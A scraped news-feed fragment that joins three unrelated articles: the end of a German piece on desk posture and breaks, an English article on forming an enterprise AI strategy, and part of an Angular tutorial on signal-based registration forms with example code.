<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1add5a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Hands-on-keyboard-tray-sitting-below-desk-height.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Hands on keyboard tray sitting below desk height" class="wp-image-3123152" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale / Foundry</p></div>



<p>Idealerweise sollten Sie beim Arbeiten vor dem Bildschirm eine neutrale Armhaltung einnehmen. Dabei bilden die Ellbogen einen 90-Grad-Winkel. Die Handgelenke können dann in einer natürlichen, entspannten Position auf dem Schreibtisch aufliegen. Starkes Beugen und Strecken der Handgelenke sollten Sie hingegen vermeiden. Dies gilt auch für das Abstützen auf einer sehr harten Oberfläche.</p>



<p>Manchmal lässt sich die richtige Höhe nur durch die Anpassung Ihres Stuhls im Verhältnis zum Schreibtisch erreichen. Ist dies nicht möglich, könnte eine <a href="https://www.amazon.de/dp/B0DTFZXQ14?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">unter dem Schreibtisch montierte Tastaturablage</a> für Ihre Tastatur und Maus von Vorteil sein.</p>



<p>Wenn Sie es noch ausgefallener mögen, kann auch ein guter <a href="https://www.pcwelt.de/article/3103046/hohenverstellbarer-schreibtisch-von-flexispot-mit-doppelmotor-ist-stark-im-preis-gesunken.html" target="_blank" rel="noreferrer noopener">höhenverstellbarer Schreibtisch</a> eine Lösung sein.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-3 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF3"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-3 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Stellen Sie Ihre Füße flach auf</h2>



<p>Wie stehen Ihre Füße aktuell unter dem Schreibtisch? Wenn Sie auf einem Stuhl sitzen, Ihre Füße aber nicht flach auf dem Boden oder auf einer stützenden Auflage stehen, sollten Sie das unbedingt ändern – und sich angewöhnen, Ihre Füße stets flach aufzusetzen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1ae553"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Feet-flat-on-ground-while-sitting-at-office-desk.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Feet flat on ground while sitting at office desk" class="wp-image-3123153" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale / Foundry</p></div>



<p>Viele Probleme mit der Haltung des Oberkörpers haben ihren Ursprung eigentlich weiter unten. Wenn Ihre Füße nicht richtig gestützt und positioniert sind, verdrehen sich Ihre Hüften und Ihre Wirbelsäule. Dies zwingt den Rest Ihres Körpers dazu, dies auszugleichen. Senken Sie Ihren Stuhl ab, sodass Ihre Füße flach auf dem Boden stehen. Wenn Ihre Füße den Boden nicht erreichen, besorgen Sie sich eine spezielle Box oder <a href="https://www.amazon.de/dp/B0FBWBC1SW/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">eine Fußstütze</a>.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-4 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF4"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-4 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Stützen Sie Ihren unteren Rücken</h2>



<p>Verfügt Ihr Stuhl über eine dynamische Stütze für die Lendenwirbel? Falls nicht, dann sollten Sie diesen Mangel dringend beheben. Ich hatte früher ständig Rückenschmerzen, aber dies ist <a href="https://www.pcwelt.de/article/2616561/fruher-hatte-ich-bei-der-buroarbeit-ruckenschmerzen-diese-5-schreibtisch-accessoires-haben-abhilfe-geschaffen.html" target="_blank" rel="noreferrer noopener">eine der Maßnahmen, die mir geholfen haben</a>.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1aed33"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/12/Sihoo-Doro-C300-Pro-close-up-of-lumbar-support-feature-design.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Sihoo Doro C300 Pro close up of lumbar support feature design" class="wp-image-2553827" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale / Foundry</p></div>



<p>Nehmen Sie sich ein Kissen oder rollen Sie ein Handtuch zusammen und platzieren Sie es so, dass es bequem zwischen Ihrem unteren Rücken und der Stuhllehne aufliegt. Eine Lendenwirbelstütze fördert die richtige Krümmung der Wirbelsäule und verhindert, dass Sie im Laufe des Tages nach hinten in den Stuhl sinken.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-5 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF5"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-5 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Hilfsmittel zur Verbesserung der Körperhaltung</h2>



<p>Im Laufe der Jahre bin ich auf viele tolle kostenlose Apps gestoßen, aber eine meiner Favoriten heißt <a href="https://sitapp.app/" target="_blank" rel="noreferrer noopener">„Sit App</a>“. Sie nutzt Ihre Webcam, um Ihre Körperhaltung zu überwachen, und gibt eine Warnung aus, wenn Sie anfangen, sich in Ihren Bürostuhl zu lümmeln.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1af64e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Upright-Go-2-accessory-for-fixing-posture-on-neck.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Upright Go 2 accessory for fixing posture on neck" class="wp-image-3123155" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale / Foundry</p></div>



<p>Wenn Sie hingegen eine zuverlässigere Hardware-Lösung bevorzugen, kann ich Ihnen den <a href="https://get.uprightpose.com/products/upright-go2" target="_blank" rel="noreferrer noopener">Upright Go 2</a> als nützliches Hilfsmittel empfehlen. Dieses Gerät vibriert sanft, wenn sich Ihre Haltung verschlechtert. Tipp: Kaufen Sie es im Set mit der Halskette, dann müssen Sie sich nicht mit Klebestreifen herumschlagen.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-6 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF6"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-6 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Bewegen Sie sich regelmäßig</h2>



<p>Egal, ob Sie bei der Arbeit sitzen oder stehen – Sie müssen Bewegung regelmäßig in Ihren Tag einbauen. Dehnen Sie sich in Ihren Pausen und drehen Sie sich von einer Seite zur anderen, um Verspannungen zu lösen. Rollen Sie Ihre Schultern, berühren Sie Ihre Zehen oder treten Sie ein paar Mal mit den Fersen gegen Ihren Po. Wenn Sie stehen, tanzen Sie vielleicht ein wenig, während Sie E-Mails lesen oder Dokumente durchforsten.</p>



<p>Keine einzelne Körperhaltung ist ideal, um sie über längere Zeit beizubehalten. Ihr Feind ist ein sitzender (sehr bewegungsarmer) Lebensstil. Kleine Mikroanpassungen und größere Makrobewegungen können viel für die Gesundheit Ihres Rückens bewirken. Wenn Sie bereits unter Rückenschmerzen leiden, dann helfen auch <a href="https://www.pcwelt.de/article/3046497/rueckenschmerzen-pc-uebungen-soforthilfe.html" target="_blank" rel="noreferrer noopener">diese Übungen</a> meist sofort</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-7 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF7"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-7 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Machen Sie Pausen</h2>



<p>Ich kenne keinen einzigen Mitarbeiter, der nicht schon mindestens einmal eine lange Arbeitssitzung hatte, bei der er stundenlang nicht aufgestanden ist. Das ist schlecht, und wir alle wissen, dass es schlecht ist, aber wir ändern dennoch nichts daran.</p>



<p>Die wichtigste schnelle Änderung, die Sie vornehmen können, sind regelmäßige Pausen. <a href="https://breaktimer.app/" target="_blank" rel="noreferrer noopener">Nutzen Sie eine App wie BreakTimer</a> für Erinnerungen, die Sie nicht ignorieren oder vergessen können. Oder finden Sie einen anderen Weg, beispielsweise E-Mail-Erinnerungen oder Erinnerungen über einen KI-Chatbot. Alles, was Sie aus Ihrem Arbeitsfluss reißt und Sie dazu bringt, aufzustehen und sich zu bewegen, ist eine gute Änderung. Peilen Sie dabei jeweils 5 Minuten Bewegung pro Stunde ein.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1b005c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/Hidden-gem-PC-app-BreakTimer.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Hidden gem PC app BreakTimer" class="wp-image-2576533" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">BreakTimer</p></div>



<p>Pausen sind auch wichtig, um Ihren Augen eine Auszeit zu gönnen. Dafür gibt es eine einfache Regel: Schauen Sie alle 20 Minuten für 20 Sekunden auf einen Punkt in etwa 6 Metern Entfernung. So können sich Ihre Augen entspannen.</p>



<p>Zwischen regelmäßigen Augenpausen, Bewegungspausen und Pausen zur Korrektur der Körperhaltung werden Sie sich schnell viel besser fühlen. Bauen Sie diese Pausen in Ihren Tag ein und machen Sie diese Abläufe zur Gewohnheit. So reihen sich diese Maßnahmen problemlos in Ihre Arbeitsroutine ein. Ihr Körper wird es Ihnen danken.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-8 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF8"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-8 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Geben Sie Ihr Bestes</h2>



<p>Machen Sie sich keine Vorwürfe, wenn nicht gleich alle Änderungen in Fleisch und Blut übergehen. Eine vergessene Pause ist nicht das Ende der Welt – versuchen Sie es einfach weiter und geben Sie Ihr Bestes. Und je öfter Sie es tun, desto leichter wird es Ihnen fallen, dran zu bleiben.</p>



<p>Nehmen Sie gleich jetzt 10 Minuten Zeit, um ein paar einfache Anpassungen vorzunehmen. In den kommenden Wochen fügen Sie einfach weitere hinzu. So finden Sie mit der Zeit die richtigen Einstellungen und Gewohnheiten, um Ihre Gesundheit am Schreibtisch zu verbessern.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-9 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF9"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-9 POST @@--></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to put a clear AI strategy into focus]]></title>
<description><![CDATA[Most experts and top IT executives agree that establishing an AI vision statement or guide is an important first step in developing an overall strategy for AI adoption in the enterprise. Developing such a statement can help companies better align their AI objectives with business goals, prioritiz...]]></description>
<link>https://tsecurity.de/de/3607305/it-security-nachrichten/how-to-put-a-clear-ai-strategy-into-focus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607305/it-security-nachrichten/how-to-put-a-clear-ai-strategy-into-focus/</guid>
<pubDate>Thu, 18 Jun 2026 12:08:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Most experts and top IT executives agree that establishing an AI vision statement or guide is an important first step in developing an overall strategy for AI adoption in the enterprise. Developing such a statement can help companies better align their AI objectives with business goals, prioritize investments in AI tools and internal development projects, and promote a shared understanding of why and how AI will be used within an organization.</p>



<p>Sounds like a no-brainer in terms of logical and responsible due diligence before diving headfirst into the AI pool, right? Unfortunately, while nearly 90% of companies plan to pour more money into their existing or planned AI investments over the next three years, Gartner found in a late 2023 survey that only 9% of these organizations have even basic AI vision statements in place that could help identify any potential problem areas or unknown shoals in a widening sea of AI innovation. The situation is not much better today, with only 14% of Global 2000 organizations claiming to have a documented AI strategy with clear goals in place, according to a <a href="https://www.hfsresearch.com/only-14-of-enterprises-have-a-clear-ai-strategy-altimetrik-and-hfs-research-find/" rel="nofollow">2026 HFS Research and Altimetrik survey</a>.</p>



<p>Without a vision, as outlined in a <a href="https://www.ai.se/sites/default/files/2023-09/aivision_eng-1.pdf" rel="nofollow">white paper</a> by an AI Vision Working Group in Sweden of people from the business community and public sector, an organization risks putting too little focus on the most valuable projects or, in the worst case, spending resources on the wrong projects. Save the Children CTO Ron Guerrier agrees, noting that it’s critical to establish an AI vision as a foundation for a well-defined AI strategy, not only for success, but to limit liabilities down the road.</p>



<p>“We live in hyper-competitive society, where shareholder value still drives a lot of what we think and do,” he says. “Envision a time when you’re sitting in a deposition and someone asks how confident you were in leveraging AI to make a final decision. If you feel like you can get past that audit or regulatory definition in two or three years, then that’s the barometer we can use to question ourselves because the technology has grown so fast that the legal world hasn’t caught up.”</p>



<h2 class="wp-block-heading">Keeping pace in the AI race</h2>



<p>There’s no one formula or template to establish an AI vision since every company and the internal dynamics that drive it are different. Add to this the expanding number of AI tools and services, as well as the constant pressure to quickly make use of these technologies to drive revenue, reduce costs, and remain competitive. “We’re at a huge inflection point,” says Satya Jayadev, former CIO and head of AI transformation at Skyworks Solutions, and now CIO at data storage developer Sandisk. “We’re looking at AI to help us with the bottom line and the top line. So, there’s a lot of pull and push that’s happening within the business.”</p>



<p>Developing an effective AI vision and strategy begins with analyzing the data and exploring what might be possible by applying AI tools, Jayadev says. But that approach becomes a lot more complicated for larger companies, and those involved in more challenging industries. Common action items associated with creating a basic AI vision framework include developing a structure that aligns AI goals with business priorities and establishing clear AI policies, including rules for data handling, ethical use, and risk mitigation.</p>



<p>Jayadev went a step further in creating his AI vision and adoption strategy by taking a three-phased approach, which can be applied to most any organization. The first concerned productivity, and what can you do with the technology now to reduce time, cut costs, and improve efficiency. At Skyworks, that included using Microsoft Copilot to streamline and speed up labor-intensive tasks like creating or summarizing emails and reports, or assisting with code generation.            </p>



<p>The second phase is differentiation. How can the technology be used to do things differently from competitors, and perhaps capture more market share or develop a faster and more efficient go-to-market strategy.</p>



<p>The third, and perhaps the one that’s still in the gestation stage since gen AI is still evolving, is disruption, and how the technology can be used to do something radically different in terms of design engineering and manufacturing. “How can we use it to create a new way of doing something, rather than a different way of doing it,” Jayadev says.</p>



<p>Not surprisingly, the task of developing an effective AI vision and charting a course through the disruption of that last phase falls squarely on the CIO as IT leader. This phase expands and amplifies transformational activities like thought leadership and establishing collaborative partnerships, and it adds driving a focused vision and leveraging the ecosystem to the mix.</p>



<p>“The entire organization has to be the change agent,” adds Jayadev, “and thought leadership is going to be the most important ingredient.”</p>



<h2 class="wp-block-heading">A force for better</h2>



<p>As AI evolves, it’s important to treat it as a force multiplier and not just a tool to reduce costs or headcount. It allows us to “start thinking about a faster go-to-market strategy, a faster operational strategy, and a more efficient, effective way of getting things done,” says Jayadev. The collateral impact of both IT and the entire organization acting as change agents might also create a shift in the hierarchical structures of the enterprise, and a restructuring in technology and business leadership.</p>



<p>“CIOs will hate me for saying it, but what they need to do now is transform,” says Guerrier. This transformation will involve more than just a title change as some CIOs have done. It’ll require adding an adjustment in mindset to focus more on data and less on fundamental transformation activities, like IT operations and modernizing legacy systems, if they expect to remain in the upper levels of the IT org chart.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a signal-first form in Angular]]></title>
<description><![CDATA[Understanding a reactivity model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained i...]]></description>
<link>https://tsecurity.de/de/3607185/ai-nachrichten/building-a-signal-first-form-in-angular/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607185/ai-nachrichten/building-a-signal-first-form-in-angular/</guid>
<pubDate>Thu, 18 Jun 2026 11:18:46 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Understanding a <a href="https://www.infoworld.com/article/2335507/reactive-javascript-the-evolution-of-front-end-architecture.html">reactivity</a> model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained in practice.</p>



<p>In two previous articles, “<a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a>” and “<a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a>,” we reframed form behavior as a state-driven problem and examined Angular Signals as a pull-based reactivity model well-suited to that kind of work. The natural next step is to apply those ideas to an actual Angular form and observe how the architecture changes when state becomes the primary concern.</p>



<p>This article focuses on a concrete example: a modest but realistic registration form. Rather than introducing new concepts, the goal here is to make earlier ideas tangible. We will see how a signal-backed model reshapes validation, interaction state, and submission logic, and how much coordination logic simply disappears when form behavior is expressed declaratively.</p>



<p>The focus here is not on novelty or completeness, but on making the underlying ideas easier to reason about. By walking through a signal-first form from model definition to submission, we can evaluate whether this approach truly reduces complexity and where it introduces new trade-offs that teams should understand before adopting it more broadly.</p>



<h2 class="wp-block-heading"><a></a>Implementing a signal-first registration form</h2>



<p>With the conceptual groundwork in place, we can now turn theory into a concrete implementation. In this section, we will build a fully working registration form using Angular’s Signal Forms API. This example is deliberately modest in scope, but it is designed to serve as the foundation for the rest of the series. Each subsequent article will extend this same example rather than introducing a new one.</p>



<p>The form collects an email address, a password, a confirmation password, and explicit acceptance of terms. While simple on the surface, this structure allows us to explore field-level validation, cross-field constraints, interaction state, and submission behavior, all without reverting to event-driven form logic.</p>



<h3 class="wp-block-heading"><a></a>Project setup and structure</h3>



<p>The example assumes a standard Angular application created with the Angular CLI and configured to use Signals (Angular 17+). The Signal Forms APIs (Angular 21+) live under @angular/forms/signals, which must be explicitly imported.</p>



<p><a href="https://github.com/sonukapoor/angular-signal-forms">https://github.com/sonukapoor/angular-signal-forms</a></p>



<p>The folder structure is intentionally conservative:</p>



<p>src/<br>  app/<br>    registration/<br>      registration.component.ts<br>      registration.component.html<br>      registration.model.ts</p>



<p>Separating the model from the component keeps form state independent of presentation. This becomes increasingly valuable as the form grows or is reused across multiple components.</p>



<h3 class="wp-block-heading"><a></a>Defining the form model</h3>



<p>We begin by defining the shape of the data that the form collects. This is a plain TypeScript interface with no Angular dependencies. Treating the form model as a simple data structure reinforces the idea that the form’s values are just state.</p>



<pre class="wp-block-code"><code>// registration.model.ts
export interface RegistrationData {
  email: string;
  password: string;
  confirmPassword: string;
  acceptedTerms: boolean;
}
</code></pre>



<p>This interface mirrors what would typically be sent to a back-end API. There is no duplication of state, no separate “form value” object, and no mapping required at submission time.</p>



<h3 class="wp-block-heading"><a></a>Creating the signal-backed form</h3>



<p>The form itself is created in the component using a writable signal as the source of truth. The <code>form()</code> function attaches form semantics validation, field state, and submission to that signal.</p>



<pre class="wp-block-code"><code>// registration.component.ts
import { CommonModule } from "@angular/common";
import { Component, signal } from "@angular/core";
import {
  email,
  form,
  FormField,
  required,
  submit,
} from "@angular/forms/signals";
import { RegistrationData } from "./registration.model";

@Component({
  selector: "app-registration",
  imports: [FormField, CommonModule],
  templateUrl: "./registration.html",
  styleUrl: "./registration.css",
})
export class Registration {
  readonly model = signal<registrationdata>({
    email: "",
    password: "",
    confirmPassword: "",
    acceptedTerms: false,
  });

  readonly registrationForm = form(this.model, (schema) =&gt; {
    required(schema.email, { message: "Email is required" });
    email(schema.email, { message: "Enter a valid email address" });

    required(schema.password, { message: "Password is required" });
    required(schema.confirmPassword, {
      message: "Please confirm your password",
    });

    required(schema.acceptedTerms, {
      message: "You must accept the terms to continue",
    });
  });

  async onSubmit(event?: Event) {
    event?.preventDefault();

    await submit(this.registrationForm, (value) =&gt; {
      console.log(value());
      // Mock Server Call
      return Promise.resolve([
        {
          kind: "EmailAlreadyExists",
          field: this.registrationForm.email,
          error: { kind: "server", message: "Email already taken" },
        },
      ]);
    });
  }
}
</registrationdata></code></pre>



<p>Several design decisions are worth noting.</p>



<p>First, the model signal is defined as read-only. All mutations to the model occur through form bindings, not ad hoc assignments in the component. This keeps the component declarative and avoids the temptation to manipulate form state imperatively.</p>



<p>Second, validation is declared in one place. The schema function describes constraints on the model without introducing control trees, validator arrays, or observable pipelines. Angular takes responsibility for re-running validation whenever the model changes.</p>



<p>Finally, submission logic is explicit. The <code>submit()</code> helper ensures that the form is valid before invoking the callback, and it passes the current model value directly. There is no need to check flags or manually extract values.</p>



<h3 class="wp-block-heading"><a></a>Binding the form to the template</h3>



<p>With the form defined, the next step is to bind it to the template. Signal Forms provide the <code>[formField]</code> directive, which connects an input element directly to a field in the form schema.</p>



<pre class="wp-block-code"><code><!-- registration.component.html -->

  <div>
    <label>Email</label>
    

    @if (
      registrationForm.email().invalid() &amp;&amp; registrationForm.email().touched()
    ) {
      <p class="error">
        {{ registrationForm.email().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Password</label>
    

    @if (
      registrationForm.password().invalid() &amp;&amp;
      registrationForm.password().touched()
    ) {
      <p class="error">
        {{ registrationForm.password().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Confirm Password</label>
    

    @if (
      registrationForm.confirmPassword().invalid() &amp;&amp;
      registrationForm.confirmPassword().touched()
    ) {
      <p class="error">
        {{ registrationForm.confirmPassword().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>
      
      I accept the terms and conditions
    </label>

    @if (
      registrationForm.acceptedTerms().invalid() &amp;&amp;
      registrationForm.acceptedTerms().touched()
    ) {
      <p class="error">
        {{ registrationForm.acceptedTerms().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    @if (registrationForm().errors().length &gt; 0) {
      <div class="error">
        @for (error of registrationForm().errors(); track error.message) {
          <p>{{ error.kind }}</p>
        }
      </div>
    }
  </div>

  <button type="submit">
    Register
  </button>

</code></pre>



<p>What stands out here is the absence of indirection. Each input binds directly to a field. Validation state is accessed through signals such as <code>invalid()</code> and <code>touched()</code>. Error messages are read from a structured error object, not reconstructed manually.</p>



